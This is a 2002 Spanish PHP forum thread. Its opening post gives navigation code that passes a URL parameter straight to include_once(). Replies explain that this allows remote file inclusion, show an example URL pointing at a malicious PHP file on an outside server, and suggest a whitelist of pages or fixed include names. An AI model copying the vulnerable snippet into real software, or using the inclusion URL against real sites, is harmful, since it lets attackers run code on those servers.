Foros del Web » Programando para Internet » PHP »

aki teneis la explicacion para un include en php

Estas en el tema de aki teneis la explicacion para un include en php en el foro de PHP en Foros del Web. 1º tienes ke poner este codigo donde kieras ke aparezca la pagina: php if (!isset($page)) { $page ="lapaginakesea.html"; } include_once ("$page"); donde pone lapaginakesea.html pones ...
  #1 (permalink)  
Antiguo 11/04/2002, 15:19
 
Fecha de Ingreso: febrero-2002
Mensajes: 111
Antigüedad: 15 años, 10 meses
Puntos: 0
aki teneis la explicacion para un include en php

1º tienes ke poner este codigo donde kieras ke aparezca la pagina:

php if (!isset($page)) { $page ="lapaginakesea.html"; } include_once ("$page");

donde pone lapaginakesea.html pones la pagina ke kieres ke aparezca al cargar ese archivo .php donde has puesto el codigo (ES IMPORTANTE KE EL ARCHIVO TENGA EXTENSION .PHP)

para ke al pulsar un link aparezca en el sitio donde has puesto el codigo tienes ke poner este codigo antes de cada enlace:

index.php?page=ellinkkekieras.html

donde pone index.php tienes ke poner el nombre de la pagina donde este el codigo d arriba y donde pone ellinkkekieras.html tienes ke escribir la pagina ke kieres ke se cargue.

Perdonen las faltas y si es breve pero se lo tuve ke explicar a un amigo y me parecio util ponerlo aki

Haz Click en el banner.
<a href="http://membres.lycos.fr/neoiw" target="_blank"><img src="http://membres.lycos.fr/neoiw/iw_imagenes/mini_iw.gif" width="88" height="31" border="0"></a>
  #2 (permalink)  
Antiguo 11/04/2002, 16:04
O_O
 
Fecha de Ingreso: enero-2002
Ubicación: Santiago - Chile
Mensajes: 34.417
Antigüedad: 15 años, 11 meses
Puntos: 126
Re: aki teneis la explicacion para un include en php

La manera de llama a ese &quot;include&quot; no me parece muy segura q digamos .. pues de esa forma puedo incluir .. ejemplo:

mipagina.php
con:
&lt;? phpinfo() ?&gt;

por decir algo ... inofensivo ..

Bajo mi punto de vista, creo que es mejor que los &quot;include&quot; se llamen desde el codigo y no con refererencias ...

En caso de necesitar incluir una pagina de esa forma .. creo q seria conveniente tener una lista de paginas &quot;autorizadas&quot; para q se chekeen si es permitido incluir o no ..

Si lo que pretendes es usar algo asi como lo que usa foros del web para presentar los links externos .. Usa frames y monta el frame dinamicamente con la direccion a la que vas a enviar ...

Un saludo,

  #3 (permalink)  
Antiguo 11/04/2002, 16:12
O_O
 
Fecha de Ingreso: enero-2002
Ubicación: Santiago - Chile
Mensajes: 34.417
Antigüedad: 15 años, 11 meses
Puntos: 126
Re: aki teneis la explicacion para un include en php

El detalle q se me olvido . .es si
el include() .. incluye paginas externas al sitio .. (me parece q no . jeje no me mire el manual).

Un saludo,
  #4 (permalink)  
Antiguo 11/04/2002, 16:13
 
Fecha de Ingreso: febrero-2002
Mensajes: 111
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: aki teneis la explicacion para un include en php

weno, ahi teneis el codigo ke yo he dado pero no he acabado de entender lo ke kerias decir, te puedes explicar mejor?? yo no me he refeido en nigun momento a el link externo de foros del web porke yo lo tngo en mi web y me funciona perfectamente.un saludo

Haz Click en el banner.
<a href="http://membres.lycos.fr/neoiw" target="_blank"><img src="http://membres.lycos.fr/neoiw/iw_imagenes/mini_iw.gif" width="88" height="31" border="0"></a>
  #5 (permalink)  
Antiguo 11/04/2002, 16:27
O_O
 
Fecha de Ingreso: enero-2002
Ubicación: Santiago - Chile
Mensajes: 34.417
Antigüedad: 15 años, 11 meses
Puntos: 126
Re: aki teneis la explicacion para un include en php

El codigo funciona .. pero la forma que lo hace no me parece corecta solo era eso.

tu haces llamadas a tus paginas de tu sitio asi:

index.php?pagina=unapagina.hml ...

De esa manera dejas ver q tienes una pagina de nombre tal .. y lo envias por metodo GET .. por el URL
asi q si pongo:
index.php?pagina=http://www.miservidor.com/phpmalicioso.php

Al hacer el include() .. mi codigo formaria parte de tu pagina .. y podria ejecutar en ella codigo PHP .. como por ejmplo un simple PHP info .. como ponia el ejemplo ..

(todo esto suponiendo q include() acepte links externos a donde se llaman).

Un salduo,

pd: En www.phpuilder.com hablan sobre el tema este de los &quot;includes&quot; en un articulo.
  #6 (permalink)  
Antiguo 11/04/2002, 16:33
 
Fecha de Ingreso: febrero-2002
Mensajes: 111
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: aki teneis la explicacion para un include en php

aaahhh, ya lo entendi, el include que e puesto sirve tambien para poner enlaces externos pero ya me di cuenta del peligro d usarlo. Alguien sabe algun include mas seguro?? muchas gracias

Haz Click en el banner.
<a href="http://membres.lycos.fr/neoiw" target="_blank"><img src="http://membres.lycos.fr/neoiw/iw_imagenes/mini_iw.gif" width="88" height="31" border="0"></a>
  #7 (permalink)  
Antiguo 11/04/2002, 17:37
Avatar de epplestun  
Fecha de Ingreso: octubre-2001
Mensajes: 1.621
Antigüedad: 16 años, 1 mes
Puntos: 5
Re: aki teneis la explicacion para un include en php

La funcion include() toma archivos externos solo en servidores Linux, o asi tengo entendido y comprobado en una de mis peripecias cuando tenia que cojer los datos del Centro Nacional de Metereologia pra el parte maritimo

<table style="border:1px solid black"><tr><td><center>
<embed width="88" height="144" src="http://www.alaplaya.com/~epplestun/yo.swf"></td></td><font face=verdana size=1>Ivan Rodriguez el poder es [B]PHP</p></td></tr></table>
  #8 (permalink)  
Antiguo 12/04/2002, 13:55
 
Fecha de Ingreso: febrero-2002
Mensajes: 111
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: aki teneis la explicacion para un include en php

Ohhh, ok, entonces no depende del codigo sino del servidor donde esté alojado no? no hay mas includes mas seguros ke este? Gracias. Salu2

Haz Click en el banner.
<a href="http://membres.lycos.fr/neoiw" target="_blank"><img src="http://membres.lycos.fr/neoiw/iw_imagenes/mini_iw.gif" width="88" height="31" border="0"></a>
  #9 (permalink)  
Antiguo 12/04/2002, 14:37
O_O
 
Fecha de Ingreso: enero-2002
Ubicación: Santiago - Chile
Mensajes: 34.417
Antigüedad: 15 años, 11 meses
Puntos: 126
Re: aki teneis la explicacion para un include en php

La funcion include() es asi, y asi funciona ...

Lo que tienes que tener claro es como usarlos .. en tu caso usas el include como si fuera un redirecionamiento ..

Una solucion a tu sistema basado en include() seria:

Usas un &quot;index.php&quot; que redireccione con header(&quot;Location: lapaginaquesea.etc&quot;) .. en este caso .. &quot;lapaginaquesea.etc&quot; debera contener las cabeceras, pies, menus y demas cosas que uses en la pagina &quot;plantilla&quot; .. Todos estos elementos (cabecera, pies, menus ..) los puedes llamar con un include() y usar los mismo para el resto de paginas. Pero date cuenta que solo son los elementos (ej.: menu.php .. pie.php .. cabecera.php ...) con nombre definido.

Otra opcion seria usar &quot;Temaplates&quot; para separar codigo de diseño pagina.

Un saludo,
  #10 (permalink)  
Antiguo 12/04/2002, 14:59
 
Fecha de Ingreso: febrero-2002
Mensajes: 111
Antigüedad: 15 años, 10 meses
Puntos: 0
Re: aki teneis la explicacion para un include en php

ok, ya entiendo, me solventaron una duda, gracias a todos.

Haz Click en el banner.
<a href="http://membres.lycos.fr/neoiw" target="_blank"><img src="http://membres.lycos.fr/neoiw/iw_imagenes/mini_iw.gif" width="88" height="31" border="0"></a>
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 06:39.